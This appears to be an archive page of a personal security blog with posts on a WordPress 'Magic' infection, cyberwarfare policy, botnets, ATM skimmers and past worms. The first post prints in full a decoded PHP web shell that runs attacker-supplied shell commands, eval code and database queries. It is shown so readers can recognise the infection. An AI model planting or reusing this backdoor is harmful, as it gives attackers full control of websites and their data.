Server at Magic Requires Username Password
August 7, 2009
The Wordpress “Magic” hack!
If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.
Wordpress Magic Attack
Wordpress user Yokima reported this very slick hack.
FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.
*Similar issues reported by techartist “server BLAH.fuzz.com at Fuzz Access requires a username and password.”
What the infected code looks like after the malware injection into your blog.. yep.. uuugly!
From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:
{
if (!function_exists('______safeshell'))
{
function ______safeshell($komut) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
if (!empty ($komut)) {
if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
//@ ob_start();
@ passthru($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('system') && !in_array('system', $disable_functions)) {
//@ ob_start();
@ system($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
$res = @ shell_exec($komut);
echo $res;
}
elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
@ exec($komut, $res);
$res = join("\n", $res);
echo $res, "\n";
}
elseif (@ is_resource($f = @ popen($komut, "r"))) {
//$res = "";
while (!@ feof($f)) {
//$res .= @ fread($f, 1024);
echo(@ fread($f, 1024));
}
@ pclose($f);
}
else
{
$res = {$komut};
echo $res;
}
}
}
};
if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
echo "
if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
if (!$result)
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
die();
}
else if (is_resource($result))
{
$res = array();
while ($row = mysql_fetch_assoc($result))
{
$res[] = $row;
};
mysql_free_result($result);
echo serialize($res);
die();
}
else
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
die();
}
};
echo "\n\n";
die();
};
};
p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.
Popularity: 1% [?]
You Hack US, We Nuke You!
May 28, 2009
The United States’ top commanding officer for the space and cyber domains told reporters last week that a cyber attack could merit a more conventional military response.
During a press briefing on Thursday, U.S. Air Force General Kevin Chilton, who heads the U.S. Strategic Command, told reporters that top Pentagon advisors would not rule out a physical attack on any force that attacks the United States through the Internet. Currently, the military’s networks are probed thousands of times a day, but the goal of attackers seems to be espionage, not to take down critical networks, he told reporters –
I don’t believe that military force is the equivalent action for a cyber attack. Arrest and/or apprehension is the physical response necessary for criminal hackers attacking from other countries. Cyber counter-attacks are the correct response for government funded & coordinated attacks.
I think if the U.S. reciprocates a cyber attack x10 when other countries are playing little games, we’d get our message across effectively. We should do so in a well funded and covert way in which the enemy has NO DOUBT that the face slap came from a U.S, hand, but no proof at all allowing plausible deniability. It should be black Ops hacks, very well coordinated, very well funded and full time.
I don’t think the US can be complacent or wrecklessly meek in matters of cyber warfare. Instead, it must be fair, quiet and heavy handed when it comes to one of its most valuable asset, information.
Popularity: 5% [?]
Weaponized Hacking
May 27, 2009
This is not your momma hacking. This is militarized hacking, Pentagon style. It is state funded with the intent of allowing the killing of people and the breaking of things.
“U.S. Defense Department officials were so impressed with the level of coordination between ground military ops and cyberattacks against strategical targets during the recent conflicts, that they are now looking for ways to weaponize hacking. Aviation Week glanced at such a device and reports that it is being designed to be easily used even by non-techy soldiers.”
softpedia
Welcome to the neo-CyberArms race! Where uncontrollable cyber weapons that can turn off cities and detonate public utility plants with the touch of a button! This is not the beginning of a William Gibson novel, this is not the synopsis of Snow Crash, or the theme of a cyberpunk trilogy this is reality… virtual reality.
On a serious note, I think China has already weaponized hacking. Hopefully, this is not the first time the US has thought about this.
Popularity: 3% [?]
Torpig Botnet Hijacked
May 5, 2009
Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert, Martin Szydlowski, Richard Kemmerer, Chris Kruegel, Giovanni Vigna of the Security Group Department of Computer Science University of California in Santa Barbara hacked into a botnet called Torpig.
Torpig gathers credit card, bank accounts and other sensitive data and sends it to criminals. The botnet had stolen 70 GB of data.
The security group took advantage of the open, decentralized nature of peer-to-peer to infiltrate it. Victims are infected by drive-by-download attacks.
They use phishing sites and advertise them on google, facebook, myspace and other popular sites. They also use email. To hijack the botnet they exploited a vulnerability in the way the malware generates a list of domains it contacts.
http://www.cs.ucsb.edu/~seclab/projects/torpig/torpig.pdf
Not becoming a victim in the first place is the most ideal situation, however. The researchers concluded that victims of botnets are usually those with poorly maintained machines and who choose “easily guessable” passwords. ” This is evidence that the malware problem is fundamentally a cultural problem,” reads the report. “Even though people are educated and understand well concepts such as the physical security and the necessary maintenance of a car, they do not understand the consequences of irresponsible behavior when using a computer.” – Jacqui Chen
Popularity: 4% [?]
Critical Infrastructure Infiltrated
April 8, 2009
So apparently, part of the U.S. critical infrastructure has already been exploited. It doesn’t surprise me. Its all fun and games with developers, engineers and scientists until their ass is getting hacked. They resist. They say “who the hell would hack this system” “HOW the hell would they hack it”. They cut corners and make excuses. Then, when the system is hacked, they blame it on the rain. The good news is that they know its been infiltrated.
I wonder why they didn’t design it as a closed network. Make all critical functions completely inaccessible to the outside world. It’s got me wondering if they even used an Information Assurance standard.
Popularity: 5% [?]
where the hell is DC719?
April 3, 2009
I’ve been thinking of going to Defcon17 this year, but I’m reluctant because I keep remembering how lonely I was the last time I went Defcon14. There I was at the MECCA of all things security basking in the glow of technological brilliance and completely alone.
Everyone seems to have a crew there. All loners I meet are to paranoid to talk to anyone. So I end up going from lecture to lecture alone. Don’t get me wrong. I like learning new things.. But too often I feel like it was something I could have just watched on TV (if it was on TV). I want to get more involved, but I don’t have skills or the time to dedicate to another mega hobby like Hacking.
So I thought about rolling out with DC719 (my local defcon group), but I’ve yet to find them. dc719.org seems to have not paid their bill or something. I heard they are all crazy gun nuts, which I think is pretty awesome. Guns and hacking seems like my kind of crowd. Strange, huh?
Anyway, dc719.. if your out there hit me up .. I might want to roll with you guys [or at least say hi]. elamb[dot]security[at]gmail.com
Popularity: 5% [?]
Al Qaeda Sites getting Hacked
October 23, 2008
This was an article that really cheered me up today. Al Qaeda websites are still getting hacked constantly. Sometimes it seems that the free world is WAY off on the “War on Terror”. With most resources going to Iraq, political rhetoric and pandering and the almost complete absence of anyone talking about capturing and/or killing Osama bin Laden, its easy to get discouraged. Its good to see that the cyberwar is still being waged on those who promote and or support terrorism.
Octavia Nasr | BIO
CNN senior editor for Arab affairsA hacking war is raging on Jihadi websites. Radical Islamist sites have been attacking and getting attacked for quite some time. The website hacking practice was common in 2001 and 2002… Following the 9/11 attacks when al Qaeda used only one website to communicate its messages to supporters and foes alike. That website was called alneda.com. It was getting constantly hacked… sometimes several hackings a day. After every hacking the site managed to resurface on the net until it disappeared from the scene in 2004 to be replaced by other websites — What started as one al Qaeda-linked site mushroomed into dozens which branched out into hundreds of supporting sites that serve as dissemination centers over the internet.
Popularity: 9% [?]
ATM Skimmers?
October 15, 2008
There’s a new way of stealing money from ATMs:
“Becki Turner got the call from her bank’s fraud department on Labor Day. The investigator wanted to know if she had withdrawn $500 from an ATM in California over the holiday weekend. She hadn’t. She couldn’t. Turner was home in Puyallup, Wash.
“I was just flabbergasted,” she says. “I had the card with me, the ATM was in another state, and the person using the machine had to have my security code.” Turner worried crooks had gotten into the banking system and stolen her password.
It wasn’t anything that complicated. Puyallup police say thieves snagged her account information — along with the debit card numbers and PIN codes of hundreds of other people — at two gas stations in the area.
They did it by installing their own hard-to-spot card reader, called a skimmer, on top of the card reader built into the pump. The skimmer is able to grab the account information from the card without interfering with the legitimate payment transaction.
The crooks used the stolen data to create (or clone) fake debit cards that were used at ATMs in Washington State over the Fourth of July weekend and in Northern California on Labor Day weekend. The bad guys like three-day holidays because it gives them more time to use the cards before the unauthorized withdrawals are spotted.”
Popularity: 8% [?]
Palin’s password was Popcorn?
October 9, 2008
I was wondering why conservative talk were accusing the Dems and/or liberals for hacking Palin’s account. Apparently, the guy who hacked into her account (gov.palin@yahoo.com) is the son of Rep. Mike Kernell, Tennessee state lawmaker. He simply used the “forgot my password” feature and then used publically available information to answer the security questions.
“Gov. Palin’s Alleged Hacker Indicted; Password Was ‘Popcorn’
A 20-year-old student at the University of Tennessee has been indicted for breaking into one of the email accounts of Gov. Sarah Palin and then posting screenshots of personal information obtained there to a public Web-site.
David Kernell, the son of a Democratic state lawmaker, was led into a Knoxville federal court wearing handcuffs and shackles on his ankles today and was released without posting bond, according to the Associated Press.”
Hope she’s changing all her passwords because more than likely they are all “Popcorn”.
http://voices.washingtonpost.com/cgi-bin/mt/mt-tb.cgi/25730
read more | digg story
Popularity: 10% [?]
Ed Skoudis lists the Top 5 Worst Attacks of 1998 – 2002
June 10, 2008
That which does not kill us makes us stronger.
-Friedrich Nietzsche
In the November 2002, Information Security Magazine article, Infosec’s Worst NightMares, Ed Skoudis lists the Top 5 Worst Attacks of 1998 – 2002. Mr. Skoudis is the founders of Intelguardians Network Intelligence, LLC and is a handler of the very popular Internet Storm Center.
Mr. Skoudis mentions that the Top five major destructive attacks of 1998 – 2002 made many industries “battle-tested” and more likely to be proactive rather than reactive. The 5 year Worst Skoudis list is based on exploits that shook our very faith in the Internet and security of e-commerce.
1. Code Red (2001). July 13 2001, the worm attacked Microsoft IIS systems. By 19 July 2001, the worm had affected over 350,000 systems. SANS and Honeynet Project set up honey pots to capture the worm. But E-eye Digital Security Programmers did the most intense research on the worm and also named it. The worm exploited a vulnerability in the indexing software distributed with IIS, described in Microsoft’s MS01-033 patch. It was a buffer overflow attack. Some of the lessons learned: Keep systems patched, use of honey pots to capture malware, coordinated response helps to contain worms.
2. Nimda (2001). Shortly after 9/11, the Nimda worm was unleashed. It caused more damage financially than Code Red. There were rumors that it was China that released it to hurt the US further, but this is unlikely due to the nature of Nimda.
While it was bad, it had the appearance of a being written by a determined amateur, not a nation-state that spends $1 Billion annually on cyberwarfare capabilities. – Skoudis.
Nimda affected Windows 95, 98, Me, NT, or 2000 and servers running Windows NT and 2000. It was so affective because it attacked IIS, e-mail, browsers and network shares. This multi dimensional attack method could mark a trend in future cyberfare.
Lessons Learned: The importance of an incident response capability, disabling arbitrary scripts in e-mail and browsers.
3. Melissa (1999) & LoveLetter (2000). Both of these exploited malware through e-mail propagation. Melissa used Microsoft Word Macro virus and LoveLetter (I Love You Virus). The worm harvested the victims address book to forward itself to more victims which killed a lot of email servers. Lessons Learned: Many companies got serious about implementing anti-virus applications throughout the network.
4. Distributed Denial-of-Service (DdoS) attacks (2000). After all the panic of pre-Y2K, a completely new and unexpected storm hit major sites: Yahoo!, Amazon, CNN, E*Trade ZDNet and eBay. All by a single child hacker nicked named Mafiaboy. He had spread zombie flooding agents to hundreds of machines around the world and used them to attack sites with billions of useless packets. Lessons Learned: employ anti-spoofing filters.
5. Remote Control Trojan Horse Backdoors (1998 – 2000). In 1998, the Cult of the Dead Cow hackers group created the Trojan, Back Orifice which initially targeted Windows NT/9x. The tool allowed unskilled attackers to attack any vulnerable system. It also marked the rise of the “script kiddies” and produced a bunch of spin offs such as Subseven, Netbus and Hack-a-Tack.
Popularity: 11% [?]
